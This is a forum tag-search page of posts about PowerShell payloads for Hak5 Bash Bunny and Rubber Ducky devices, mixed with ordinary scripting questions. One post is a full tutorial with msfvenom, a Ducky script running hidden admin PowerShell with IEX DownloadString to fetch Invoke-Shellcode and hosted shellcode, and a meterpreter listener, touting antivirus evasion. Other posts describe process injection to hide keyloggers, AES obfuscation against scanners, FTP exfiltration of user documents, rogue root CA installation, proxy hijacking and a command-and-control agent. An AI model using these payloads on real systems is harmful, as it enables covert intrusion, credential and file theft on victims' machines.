Jump to content

Search the Community

Showing results for tags 'powershell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. I've updated my psh_DownloadExecSMB payload to allow for exfiltration. psh_DownloadExecSMB will take any powershell payload, execute it and alert via green LED when it's completed. All file transfers happens over SMB to the Bash Bunny. In order to exfil data, have your powershell payload upload to \\\s\l\ -- this will be copied to the BB as loot. Bonus: Because this payload uses SMB, any captured SMB credentials will be stored as loot. My Repo: https://github.com/hink/bashbunny-payloads/tree/payload/pshExecFixes/payloads/library/execution/psh_DownloadExecSMB Pull Request: https://github.com/hak5/bashbunny-payloads/pull/268
  2. Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/uintdev/RevShellBack
  3. Okay all, I finally finished this thing well enough for me to release but more work yet to be done. It works. Try it out and let me know what you think. I got tired of fiddling with it and just decided to get something out there. https://github.com/PoSHMagiC0de/BBTPS Oh, my first time actually using github too. I usually have friends in town who does pushed on my behalf..cause I am lazy. I decided to learn git and do it myself.
  4. Hello all, I have 4 headless PCs here at my house and I was wondering in the event the internet goes down and I need to do a file transfer or something. Could I just plug the bash bunny in and have it execute a powershell script so I don't have to find a spare monitor and keyboard? Thanks, new to the bashbunny.
  5. Hi guys, Simple PowerShell question; If I want to copy a multi-line set of data to the clipboard, what is the best way to do it? I have the below at the moment, which successfully copies the data between the braces, however the variable $testing is literally copied as "$testing", and not as "blabla". Any better way of doing this? Thanks. $testing = "blabla" {Testing 1 Testing 2 Testing 3 $testing etc } | clip
  6. Violation of CoC
  7. Why is the below not working correctly? It should Write-Host 'Active', but it doesn't? PS C:\Windows\system32> $(Get-ADUser JoeBloggs -Properties *).PasswordExpired False PS C:\Windows\system32> if ($(Get-ADUser JoeBloggs -Properties *).PasswordExpired -eq "False") { Write-Host "Active" } else { Write-Host "Locked" } Locked Thanks.
  8. Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we? Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer). Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that! STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines. DELAY 500 GUI x DELAY 1000 a DELAY 1000 ALT y DELAY 1000 STRING powershell -WindowStyle hidden ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1') ENTER DELAY 1000 STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp') ENTER DELAY 1000 STRING Invoke-Shellcode -Shellcode ($buf) -Force ENTER What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code. To set up the listener, open up a terminal in Kali. >msfconsole >use exploit/multi/handler >set payload windows/x64/meterpreter/reverse_https >set LHOST XXX (whatever IP you used, which would be your kali machine IP) >set LPORT XXX (whatever port you used) >exploit And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.
  9. I'm having trouble writing a powershell script that will 'exit' the terminal after running the code. This problem occurs when using a Quack script on the Bash Bunny. Here's the end part of the Ducky script into that I wrote: I pretty sure that's correct, and it should exit after deleting a file called ip.txt However, no such luck. What I have tried to solve the problem: STRING EXIT STRING Exit STRING exit; STRING del ip.txt; exit; But, no of these make a difference. I even checked a Ducky script written by DarrenHak5 who has the same way of exiting the powershell terminal. So, I can't understand why it's not working for me. If I manually type exit it will do so, if the HID type it, it will not exit. Guys, do you have any suggestions? Thanks
  10. https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber It has been a while since my script was updated so if anyone want to want to help make it more effective or make it faster it would be much appreciated :D
  11. Hi guys, I have the following PowerShell code; $FolderPath = "\\server\folder1\folder2\~folder3" $SplitFolder = $FolderPath -split '\\' I can then echo each split using; echo $SplitFolder[2] server echo $SplitFolder[3] folder1 echo $SplitFolder[4] folder2 but when I get to echo $SplitFolder[5], because the folder name begins with a tilde (~), it fails; echo $SplitFolder[5] Cannot index into a null array. At line:1 char:1 + echo $SplitFolder[5] + ~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : NullArray Any ideas why the -split fails to set the variable correctly, for the folder beginning with a tilde? Please note that I am planning on making the folder path an input from the user, so they may put in any path. Therefore, I cannot simply escape the one character, as it will be different each time. Thank you.
  12. Hello, I wanted to download files via CMD, and the first way I discovered was FTP. I rent a server and everything worked. The problem is that it takes kinda long to type in the credentials. After some research I found this PowerShell line: powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/file.exe','%TEMP%\file.exe') But I have some questions: What is the part after %TEMP% for? Is that the destination where the files "arrives"? So if i wanted to download it to C:\, I just have to change it to C:\, right? Where can I host the file for free? I found some web server hosting sites, but the only databases I was able to find were FTP and MySQL. Thank you for your help ;)
  13. Hopefully I get the voting thing right as I wanted to add content, we will see. If you see 2 separate posts, it is because I am ignant. (spelled wrong on purpose). So, in my travels on this board, I have come across people building agents to run their Powershell scripts. Most make out fine. What has prompted this is I have been asked a few times about how I build an agent or even help in building one. The BBTPS is awesome, it just is advanced and scary to some. Plus if you are running only 1 payload and need no dynamic payload delivery then BBTPS is too much. Welp, I like helping, some of the time. In this case I am a helper. Who here would like a general purpose Powershell agent? All of its control can be done from the parameters for the function. Plan: It will be a single run only agent meaning once script is ran, it will exit unless the script doesn't end. Delivery of contents and results back to the server is not controlled by the agent like in its original version but controlled by the script ran. This means your script is responsible for talking back to the BB in whatever way you choose to deliver its contents. Instead of the version 1.0 version of bbAgent.ps1 that assumes all scripts are compressed, this will be the pre 1.0 which can take a script as text, compressed or plain utf8 base64 encoded. This means whatever format you choose, the script has to be formatted as such with launcher command if it is a function that requires calling. All configuration is done from parameters used when the function for the agent is launched. Protocol (SMB, HTTP, USB) Location: Dynamic param and depends on Protocol if this will be full url, network path or drive path for the script to be ran. Encoding: Is it text, compressed or base64. I have more but first want to know the interest before I leave the BBTPS for a minute to do this. For it to work it will be a 2 stage launch like in a chain. Your Quack command will be calling the agent with parameters. It will download the agent and run it with parameters which should be pointing to your script you want to run. It will download, decode if it has to and run our script. It will check on the job every two seconds. if it ends, it removes the job and exits cleanly. If the script keeps running, the agent keeps doing this cycle forever. Yeah, I type a lot.
  14. Hmm, So, who is interested in injecting their powershell process into another process to hide it? Only advantage to this is if you are not going to be there. Makes no sense to do it with the BB connected since you are going to be there but if you ever wanted to leave something behind (like the keylogger payload) but want it to be hidden well I can create a solution for you. I planned on doing it eventually when I was done optimizing the BBTPS but I can take a break from it to think of and create a template for ya'll. It will be borrowing from the PowershellEmpire teams PSInject module which uses the reflectivedllinject module from Powersploit to inject a dll that is 32bit or 64bit (dll holders and code to inject base64 unicode powershell into it before injection is all done by the Powershell Empire team' work, no need to reinvent the wheel. You can see I am a fanboy of theirs. :-P). The ideal way to use this is your launcher will be what is injected that will download the rest of the script. Reason for this is the placeholder in the dlls for the powershell code is only 3000 bytes big. That means your script after being encoded (and it has to be encoded) can only be 3000 characters long. No compression supported. Encode it and then do a length on it to see. But....your launcher will most likely be tiny and it will download and load the rest of the script which will have no limitation. The limitation is only with the initial injected powershell code into the dll. It will have to be a 2 stage process. First stage is quacked and pulls the injector script. The injector script will be psinject and command to invoke it along with all parameters and your base64 script are appended to the end so it all gets downloaded and ran with no additional stuff....or you can add an extra function to the injector to download your base64 script to add to the command and run. The script you use with the injector will be similar to the one first launched to get things started meaning it is injected into the premade dlls and then into the process of your choice and it then becomes the download cradle for your actual payload. So. Phase 1, get admin, or not if you are not aiming at a system process. Phase 2. Run first download cradle (same commands everyone is running to get their scripts started with QUACK) to get injector that will inject and launch second download cradle that will pull your actual script (like keylogger). After it is running, you will not be able to see it unless you use a tool like Sysinternals process explorer and inspect the threads of that process. Warning, no output to the console is shown with injected process unless you write it somewhere like to a file or send it back to the server but consider the injected process to have no console access. Of course you could still launch programs and do messageboxes to interact with the local terminal. if you inject a neverending process, it will never end and will not be able to be killed unless you use process explorer to kill its thread or you kill the process it hides in. Reboot would work too. Once again, for quick smash and grab runs this is highly useless but for deposits it is worthwhile. Let me know. No sense doing all the work with no interest hehe. "Just because you have a hammer, doesn't make everything a nail." :-P
  15. EncDecFiles.ps1 Author: (c) 2017 by QDBA Version 1.0 Description EncDecFiles.ps1 is a powershell script to Encrypt / Decrypt a powershell (or any other) file with AES. You can use it to obfuscate your powershell script, so AV Scanner doesn't detect it. Usage: EncDecFiles.ps1 < -Encrypt | -Decrypt > # encrypt or decrypt a file < -In Filename > # Input File [ -Out Filename ] # Output File [ -Pass Password ] # Password Example 1 - encdecfiles.ps1 -In c:\test.ps1 -encrypt Encrypts File c:\test.ps1 with password "hak5bunny" encrypted file is c:\test.enc Example 2 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -pass secret Encrypts File c:\test.ps1 with password "secret" encrypted file is c:\test.enc Example 3 - encdecfiles.ps1 -In c:\test.ps1 -encrypt -Out c:\encrypted-file.aes -pass Secret Encrypt a File c:\Test.ps1 with password "Secret" encrypted file is c:\encrypted-file.aes Example 4 - encdecfiles.ps1 -In c:\Test.enc -decrypt Decrypt a encrypted file c:\test1.enc to c:\test1.ps1 with default password "hak5bunny" How to run the encrypted powershell script In the Script "Run_Script_Example.ps1" you see an example how to load and execute the encrypted Script. Load the encrypted script to a variable. Than execute the function Run with the variable and a password Download https://github.com/qdba/MyBashBunny/tree/master/Other/EncDecFiles
  16. Discussion Thread for Root CA installer. (No Local Admin Rights necessary) current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working) pull request waiting. small Howto create self-signed-root-ca: Create the Root Certificate (Done Once) Creating the root certificate is easy and can be done quickly. Once you do these steps, you’ll end up with a root SSL certificate that you’ll install on all of your desktops, and a private key you’ll use to sign the certificates that get installed on your various devices. Create the Root Key The first step is to create the private root key which only takes one step. In the example below, I’m creating a 2048 bit key: openssl genrsa -out rootCA.key 2048 The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3: openssl genrsa -des3 -out rootCA.key 2048 You’ll be prompted to give a password, and from then on you’ll be challenged password every time you use the key. Of course, if you forget the password, you’ll have to do all of this all over again. The next step is to self-sign this certificate. openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit. You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:Oregon Locality Name (eg, city) []:Portland Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords Organizational Unit Name (eg, section) []:IT Common Name (eg, YOUR name) []:Data Center Overlords Email Address []:none@none.com Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
  17. Hello all, I have been trying to figure out a good payload to make for the BashBunny. Seems like most of you thought of the simple ones. The ones I was going to improve it seems the authors are on it so just dropping help here and there is really all that is needed. So, what could I write. Welp, after contributing to Powershell Empire and using other frameworks and having a partial framework I stopped working on myself in Powershell I decided to re-purpose parts of it and put it toward the BB. I been hearing people asking about dynamic switching and stuff like that. Welp, I decided work on a Bash Bunny Total Pwn System. I am terrible at names. It comprises of a nodejs server on the bash bunny serving payloads to Powershell agent that is launched on the machine. The whole process will be triggered by a stager that is quacked off onto the victim's machine. The stager will wait for the nodejs server to come up and pull the agent which it will execute. The agent will check in and check for jobs. It pulls a job from the server every 2 seconds. Each job is in json that includes a name for what the job to be called, and filename to be called for the return info on the BB. Jobs are defined on the server in a json file. After all jobs are deployed and none are left, the agent will continue to check the server for jobs while there are still jobs running on the agent. Job results can be delivered as text back to the nodejs server or files can be delivered back to the BB via SMB. SMB delivery has to be included with the script job being ran as the agent does not do this. When each job finishes on the agent, either its results will be returned or the job stats will be. When all jobs are done and none are left to retrieve, the agent will send the quit command back to the server so it can die and continue on in the payload script. The nodejs server will control the leds to let you know its status between each stage. The reason for the continuing to search for jobs after none are left is if you have a script that will check or do something before it can do something else, you can pull that as a job and call back to the server to push a job to be deployed. It will be picked up on the next cycle making this dynamic. So far I am 90% done with the server and about 30-40% done with the Powershell agent. I hope to have a rough working version of it on github in about a week or two depending on how busy I am with work. If you are wondering about it working on Mac and Linux. The server will fully neutral. That means if you have the skills, you can create an agent for those two Oses. I will be busy with the server and powershell agent mostly. A good example on building a python agent can be seen by looking at the Empire 2.0 python agent code on Github. That could give you some ideas minus all the roll your own crypto it does. Payloads will have the ability for you to format them before loading them on the BB as regular text, base64 encoded (utf8, not unicode so you can use python to encode it even without have to add 0x00 after each byte) or compressed. I will be putting some Powershell tools to help with creating these payloads on github as well. I modified Powersploit's Out-encodedcommand to only the compressed encoded script without the command to decompress it and the powershell part. The agent has a function to handle decompressing it back to full form. This is useful for large scripts. I said a lot about it so far. I will probably have the code up before I can build detailed docs for it so first iteration will be instructions on what is necessary to get started. Future additions after first release will include an extras url for pulling down extra files like dlls or what not in base64 encoding that you can use in your script like reflectiveinjection or like one of mine I built to Empire and have it all modularize and everything and have yet to submit a push to Empire repo. It is a proxy hijacker. If you are admin, have a burp session running and the public cert, this script can point a victims machine at your burp computer to be proxied via http and https and install the burp cert to the machines local machine trusted root auth's. I like to call it "Perfect Man in the Proxy" or "ProxyHijack". The cert can be pulled by the script later to be used from the extras url. No more typing, more coding. Stay tuned. Yeah, kinda big for my first BB project.
  18. Localized SMB Powershell delivery. For when USB and Web methods are disabled or too noisy. https://github.com/hak5/bashbunny-payloads/pull/172
  19. Violation of CoC
  20. I liked the USB Exfiltrator so much I wanted to try and make one that was able to grab everything and dump it to a FTP site. This way if there are large/many documents it wouldn't fill up the BashBunny. Script is pretty simple, it executes a PowerShell script that clears the run history and then starts uploading the users documents directory. It will keep PowerShell running in the background so if there are a lot of files or large files go ahead on unplug the BB once the status light is green, it will just keep going. Still new to this and know there will be some bug or errors so welcome any feedback. https://github.com/nutt318/bashbunny-payloads/tree/master/payloads/library/ftp_exfiltrator
  21. Here's a simple payload to download and execute a powershell payload locally from the BashBunny. This payload is especially useful when running larger Powershell scripts. It's much faster than waiting on HID keystrokes.
  • Create New...